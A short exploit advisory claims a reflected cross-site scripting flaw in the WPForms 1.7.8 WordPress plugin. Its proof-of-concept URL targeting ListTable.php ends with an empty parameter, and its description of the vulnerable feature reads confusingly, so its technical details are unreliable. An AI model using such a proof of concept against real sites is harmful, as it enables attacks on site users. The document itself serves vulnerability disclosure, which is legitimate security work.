# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS) # Date: 2022-12-05 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/wpforms-lite # Version: 1.7.8 # Tested on: Windows 10 # CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: https://$target/ListTable.php?foobar=